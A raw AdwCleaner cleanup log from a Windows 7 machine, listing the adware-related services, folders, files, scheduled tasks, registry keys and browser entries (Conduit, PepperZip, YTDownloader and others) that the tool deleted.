[-] Key Deleted : HKLM\SOFTWARE\SearchModule
[-] Key Deleted : HKLM\SOFTWARE\Universal
[-] Key Deleted : HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2D471A31-4FA7-95BA-1880-D441113ED736}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2DF3E224-05CD-4113-AA7A-86F2F6607B46}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F488658-35A7-2AB8-A756-560BA8F103C3}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{779D1843-0043-65D2-D781-8614F17B6222}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C60D3D4E-3B20-5AB3-7F2C-9C946AD4080F}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DnsBasic
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PepperZip
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B6D700D3-3D0D-FEEB-D675-2CE78F9EC5D6}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A3FC46A0-9B62-0EF3-B475-743B3A2762B1}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{194FED75-9C74-BDB7-53F8-8CFFEF1AFEC9}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BE360B8B-0F10-CA89-FC84-A5EAB71A6AF8}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F1422DAA-0829-09A1-7536-73936CAB8FFA}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{70BD2558-27DA-8B02-02D0-D8704ECD2EDF}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{532970A2-464B-73CB-BBC4-F209EAD3EEBE}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{80E8B0A0-117D-1402-7CDE-688156237115}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CA8C94BE-9F47-1B2E-90F8-D8C07119BD96}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D831E399-50FE-84AE-F5F7-0A63AC282464}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{FE139F4C-CE5B-121A-8A2D-191FA2226094}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7E7FAE3D-3358-D280-8DBF-E8E2D94326D1}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\igsc
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverAgent_is1
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D66BF89F-B0A2-48F5-A2E4-242EB645AB76}_is1
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B10BC31B-DBC6-56FE-DD3D-DD4E49A3E6CE}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VideoPerformer
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{55d4b236-fe79-4782-cc2d-55acaf147087}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9D9BEFAE-9499-F52B-6CC4-94818CCC2AB5}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
[-] Key Deleted : [x64] HKLM\SOFTWARE\InstalledBrowserExtensions
[-] Key Deleted : [x64] HKLM\SOFTWARE\Tarma Installer
[-] Key Deleted : [x64] HKLM\SOFTWARE\YTDownloader
[-] Key Deleted : [x64] HKLM\SOFTWARE\SearchModule
[-] Key Deleted : [x64] HKLM\SOFTWARE\WebBar
[-] Key Deleted : HKU\.DEFAULT\Software\IBUpdaterService
[-] Key Deleted : HKU\.DEFAULT\Software\Browser
[-] Key Deleted : HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key Deleted : HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
[-] Key Deleted : HKU\.DEFAULT\Software\AppDataLow\Software\Object Browser
[-] Key Deleted : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\iWebar
[-] Key Deleted : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Object Browser
[-] Key Deleted : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\video MediaPlay-Air
[-] Key Deleted : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\_CrossriderRegNamePlaceHolder_
[-] Key Deleted : HKU\S-1-5-19\Software\Browser
[-] Key Deleted : HKU\S-1-5-19\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key Deleted : HKU\S-1-5-20\Software\Browser
[-] Key Deleted : HKU\S-1-5-20\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Features\A5900AE28AD765042A181FC92923C540
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Products\A5900AE28AD765042A181FC92923C540
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\A97CEC23332751B47BA4B95BAA50C9D0
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\30C16B15B255BD349A1157B8A83E2AF9
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\ED1CAE30F47D14B41B5FC8FA53658044
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A5900AE28AD765042A181FC92923C540
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\A97CEC23332751B47BA4B95BAA50C9D0
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{4C4C7AAB-5854-4241-A414-E2F1EF119C4A}
[-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes\{4C4C7AAB-5854-4241-A414-E2F1EF119C4A}
 
***** [ Web browsers ] *****
 
[-] [C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com
[-] [C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : mhkaekfpcppmmioggniknbnbdbcigpkk
 
*************************
 
:: "Tracing" keys removed
:: Winsock settings cleared
 
########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [33857 bytes] ##########
# AdwCleaner v5.030 - Logfile created 01/01/2016 at 04:46:22
# Updated 17/01/2016 by Xplode
# Database : 2016-01-17.3 [Server]
# Operating system : Windows 7 Ultimate Service Pack 1 (x64)
# Username : Nexus Media Server - NEXUS_MEDIA_SVR
# Running from : C:\Users\Nexus Media Server\Downloads\adwcleaner_5.030.exe
# Option : Cleaning
 
***** [ Services ] *****
 
[-] Service Deleted : BrsHelper
[-] Service Deleted : sbmntr
[-] Service Deleted : netmon_wfp
[-] Service Deleted : Program Manager
 
***** [ Folders ] *****
 
[-] Folder Deleted : C:\Program Files (x86)\DnsBasic
[-] Folder Deleted : C:\Program Files (x86)\DriverToolkit
[-] Folder Deleted : C:\Program Files (x86)\eSupport.com
[-] Folder Deleted : C:\Program Files (x86)\Itibiti Soft Phone
[-] Folder Deleted : C:\Program Files (x86)\PepperZip
[-] Folder Deleted : C:\Program Files (x86)\VideoPerformer
[-] Folder Deleted : C:\Program Files (x86)\YTDownloader
[-] Folder Deleted : C:\Program Files (x86)\Mozilla Firefox\Extensions\{650EED71-89E2-453B-8DCF-2AA1B4AE6EF3}
[-] Folder Deleted : C:\Program Files (x86)\Common Files\ProgramManager
[-] Folder Deleted : C:\ProgramData\Conduit
[-] Folder Deleted : C:\ProgramData\EEnjouyCCoupon
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverToolkit
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eSupport.com
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PepperZip
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Local\BrowserHelper
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\LocalLow\Conduit
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games Bot
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoPerformer
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YTDownloader
[-] Folder Deleted : C:\Windows\Microsoft\sogrMed
 
***** [ Files ] *****
 
[-] File Deleted : C:\Program Files\Common Files\System\SysMenu.dll
[-] File Deleted : C:\Program Files\Common Files\System\SysMenu64.dll
[-] File Deleted : C:\Users\LogMeInRemoteUser\Desktop\PepperZip.lnk
[-] File Deleted : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Knctr.lnk
[-] File Deleted : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bm.lnk
[-] File Deleted : C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\invalidprefs.js
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\Continue VuuPC Installation.lnk
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\Find Drivers with DriverAgent.lnk
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\PepperZip.lnk
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\SpeedAnalysis.lnk
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\Sync Folder.lnk
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\YTDownloader.lnk
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\Continue GamesDesktop Uninstaller.lnk
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\Continue Games Desktop.lnk
[-] File Deleted : C:\Users\Public\Desktop\Knctr.lnk
[-] File Deleted : C:\Windows\SysNative\ImhxxpComm.dll
[-] File Deleted : C:\Windows\SysNative\drivers\netmon_wfp.sys
 
***** [ DLLs ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
[-] Task Deleted : GoogleUpdateTaskUserM_1_7_22_478699874-4155726479-3780505679-3006UA__333630343534353131342d235b783432415b45345a2d6c
 
***** [ Registry ] *****
 
[-] Value Deleted : HKLM\SOFTWARE\Classes\.htm\OpenWithProgIDs [BrowserHTM]
[-] Value Deleted : HKLM\SOFTWARE\Classes\.html\OpenWithProgIDs [BrowserHTM]
[-] Value Deleted : HKLM\SOFTWARE\Classes\.shtml\OpenWithProgIDs [BrowserHTM]
[-] Value Deleted : HKLM\SOFTWARE\Classes\.webp\OpenWithProgIDs [BrowserHTM]
[-] Value Deleted : HKLM\SOFTWARE\Classes\.xht\OpenWithProgIDs [BrowserHTM]
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\SysMenu.DLL
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\ForeceRemove
[-] Key Deleted : HKLM\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\MPCBContextMenu
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{37AC0F3B-749F-3B22-811B-5A019EED2E85}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{66DF7821-ED6D-3534-893C-0E89E74B0F91}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{755CAFCC-F016-3B06-8F22-945EAA3AD10D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{903F9872-E87F-3B74-83B0-DBE10073B29D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{4392A6CC-7940-310E-8E16-799A8D93A438}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{05660A04-00F1-3A04-AB3B-BC1074B84D67}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{9558EEB4-CDA6-3778-B53B-98076F0A1E90}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{76552F88-640C-314D-82B6-0D8A740907F7}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{B25AA9BA-FD52-3E5E-BFE3-9B106779DA6E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{C852CF9F-37DC-35AC-926A-7E6CFFF7C501}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{C9777796-4378-3C90-B52D-7238FFFC2A5C}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{DB1BC8B2-FDBF-30E7-BE1C-AFF9160059E6}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{F3D5729C-7DEB-3850-A026-D0E323ECFEF5}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{FEC70973-CB8B-351C-8047-CAE1274CE249}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\MediaPlayer\ShimInclusionList\browser.exe
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PepperZip.exe
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\VideoPerformer.exe
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\YTDownloader.exe
[-] Key Deleted : HKLM\System\CurrentControlSet\Services\Eventlog\Application\Update Hatchiho
[-] Key Deleted : HKLM\System\CurrentControlSet\Services\Eventlog\Application\Util Hatchiho
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [Plus-HD-1.2-bg.exe]
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [Object Browser-bg.exe]
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [iWebar-bg.exe]
[-] Key Deleted : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key Deleted : HKLM\SOFTWARE\5f558f8db334ea14
[-] Key Deleted : HKLM\SOFTWARE\74ed1f33-1353-c366-d984-ccbd88bb8dd2
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{FCF8BFD3-39B8-4370-B464-EC2AAACD97CF}
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{9CB2CD61-FFA0-406C-9D2D-8FDE6F4A4D8A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{D813D5BB-EBC7-45F9-B8A4-36A305168069}
[-] Key Deleted : HKCU\Software\Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}
[-] Key Deleted : HKCU\Software\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
[-] Key Deleted : HKCU\Software\Classes\CLSID\{E4B02201-EA08-35F8-DE8D-19BB02BBFA9D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{AF175732-0D59-716D-F757-9F1492D808D9}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3070CF0C-F396-3DCA-87D6-9DBF3D77B610}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{4529EB14-6B38-3CC4-9504-6EAB6C9E1255}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{BEEA930F-CD8A-341E-B6B5-5BAF659685D5}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F03955F1-309E-34E9-A021-1399C3532273}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{2097A1B6-E86A-4072-A32D-2249A3ECBC5A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D879A501-50A7-BEFC-A4C5-32DC6E0CB208}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{B33BD6CF-BF4C-4CF0-AC84-B2974BC14ABD}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A6D54287-7939-466A-8579-92546D946C8C}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{E4C3E50F-5761-4BF8-95A0-939A819DF1C3}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{A0EE0278-2986-4E5A-884E-A3BF0357E476}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{9AE7A6AE-162E-44C4-9A2B-A6B4EF19909D}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{4723AAA8-B2F9-4CC1-9E60-190976DB1FA4}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{4723AAA8-B2F9-4CC1-9E60-190976DB1FA4}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{EEE6C35B-6118-11DC-9C72-001320C79847}]
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{EEE6C35C-6118-11DC-9C72-001320C79847}]
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{EEE6C367-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{17a1668a-3eeb-437f-8b25-9d7206eae93d}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{253d390a-8412-4b6d-86d4-e3cac4fdd5ca}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{020B1D4B-5738-4C77-9E19-4F173DD9B486}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{3070CF0C-F396-3DCA-87D6-9DBF3D77B610}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{4529EB14-6B38-3CC4-9504-6EAB6C9E1255}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{BEEA930F-CD8A-341E-B6B5-5BAF659685D5}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{F03955F1-309E-34E9-A021-1399C3532273}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{2097A1B6-E86A-4072-A32D-2249A3ECBC5A}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{00000000-BA82-4612-BE43-95B8B482C269}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{B33BD6CF-BF4C-4CF0-AC84-B2974BC14ABD}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{E4C3E50F-5761-4BF8-95A0-939A819DF1C3}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{17a1668a-3eeb-437f-8b25-9d7206eae93d}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{253d390a-8412-4b6d-86d4-e3cac4fdd5ca}
[-] Key Deleted : HKCU\Software\Browser
[-] Key Deleted : HKCU\Software\Conduit
[-] Key Deleted : HKCU\Software\DriverToolkit
[-] Key Deleted : HKCU\Software\eSupport.com
[-] Key Deleted : HKCU\Software\GlobalUpdate
[-] Key Deleted : HKCU\Software\IM
[-] Key Deleted : HKCU\Software\InstalledBrowserExtensions
[-] Key Deleted : HKCU\Software\MPC
[-] Key Deleted : HKCU\Software\OffersWizard
[-] Key Deleted : HKCU\Software\PepperZip
[-] Key Deleted : HKCU\Software\performersoft llc
[-] Key Deleted : HKCU\Software\SoftwareUpdater
[-] Key Deleted : HKCU\Software\subpar
[-] Key Deleted : HKCU\Software\tuguu sl
[-] Key Deleted : HKCU\Software\Tutorials
[-] Key Deleted : HKCU\Software\WNLT
[-] Key Deleted : HKCU\Software\YTDownloader
[-] Key Deleted : HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
[!] Key Not Deleted : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key Deleted : HKCU\Software\AppDataLow\Software\BackgroundContainer
[-] Key Deleted : HKCU\Software\AppDataLow\Software\BackgroundContainerV2
[-] Key Deleted : HKCU\Software\AppDataLow\Software\Conduit
[-] Key Deleted : HKCU\Software\AppDataLow\Software\Object Browser
[-] Key Deleted : HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
[-] Key Deleted : HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
[-] Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
[-] Key Deleted : HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key Deleted : HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}
[-] Key Deleted : HKLM\SOFTWARE\Boost
[-] Key Deleted : HKLM\SOFTWARE\Conduit
[-] Key Deleted : HKLM\SOFTWARE\DnsBasic
[-] Key Deleted : HKLM\SOFTWARE\GlobalUpdate
[-] Key Deleted : HKLM\SOFTWARE\IGS
[-] Key Deleted : HKLM\SOFTWARE\InstalledBrowserExtensions
[-] Key Deleted : HKLM\SOFTWARE\SearchModule
[-] Key Deleted : HKLM\SOFTWARE\Universal
[-] Key Deleted : HKLM\SOFTWARE\VideoPlayerV3
[-] Key Deleted : HKLM\SOFTWARE\YTDownloader
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{194FED75-9C74-BDB7-53F8-8CFFEF1AFEC9}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2D471A31-4FA7-95BA-1880-D441113ED736}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2DF3E224-05CD-4113-AA7A-86F2F6607B46}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{532970A2-464B-73CB-BBC4-F209EAD3EEBE}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{55d4b236-fe79-4782-cc2d-55acaf147087}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F488658-35A7-2AB8-A756-560BA8F103C3}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{70BD2558-27DA-8B02-02D0-D8704ECD2EDF}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{779D1843-0043-65D2-D781-8614F17B6222}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7E7FAE3D-3358-D280-8DBF-E8E2D94326D1}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{80E8B0A0-117D-1402-7CDE-688156237115}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9D9BEFAE-9499-F52B-6CC4-94818CCC2AB5}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A3FC46A0-9B62-0EF3-B475-743B3A2762B1}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B10BC31B-DBC6-56FE-DD3D-DD4E49A3E6CE}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B6D700D3-3D0D-FEEB-D675-2CE78F9EC5D6}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BE360B8B-0F10-CA89-FC84-A5EAB71A6AF8}
